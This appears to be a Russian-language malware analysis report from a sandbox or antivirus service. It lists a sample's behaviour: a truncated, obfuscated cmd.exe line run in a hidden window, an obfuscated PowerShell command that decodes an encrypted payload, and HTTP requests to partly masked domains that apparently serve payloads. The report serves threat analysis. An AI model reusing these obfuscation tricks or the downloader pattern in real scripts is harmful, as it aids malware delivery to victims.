Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' MfjsGwJtOvboq dUTwjrBCYNFDvDzKwStUU rKAJLqMLjisAIk & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %BHHjEqXqURYbpBD%=rqtWtViAAviQb&&set %SdqrKuAuzIQB%=p&&set %OTfR...
Сетевая активность
Подключается к
- 'se###dweb.com':80
- 'se###dweb.com':443
- 'ta###le.com.au':80
- 'ta###le.com.au':443
- 'pk#.goog':80
- 'we####tworks.com':80
- 'su#######ottageandpottery.com':80
- 'ze###orks.co.jp':80
- 'ze#####ks.securesite.jp':443
TCP
Запросы HTTP GET
- http://se###dweb.com/z19F/
- http://ta###le.com.au/1bXkC/
- http://pk#.goog/gsr1/gsr1.crt
- http://we####tworks.com/fCMlpsD/
- http://su#######ottageandpottery.com/IhmWY5/
- http://ze###orks.co.jp/zOqMZ/
Другие
- 'se###dweb.com':443
- 'ta###le.com.au':443
- 'ze###orks.co.jp':443
UDP
- DNS ASK se###dweb.com
- DNS ASK ta###le.com.au
- DNS ASK pk#.goog
- DNS ASK we####tworks.com
- DNS ASK su#######ottageandpottery.com
- DNS ASK ze###orks.co.jp
- DNS ASK ze#####ks.securesite.jp
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' MfjsGwJtOvboq dUTwjrBCYNFDvDzKwStUU rKAJLqMLjisAIk & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %BHHjEqXqURYbpBD%=rqtWtViAAviQb&&set %SdqrKuAuzIQB%=p&&set %OTfR...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " & ( ([sTrINg]$VerBOSePREfereNCe)[1,3]+'x'-JoIN'')(([RUNTiMe.iNteroPSERvIces.maRSHAl]::ptrTOsTRiNgUNi([rUnTIMe.InTeROpseRviCes.marShAl]::sEcUREstrINGTOGLoBAlallOCunICode($('76492d1116743f04234...
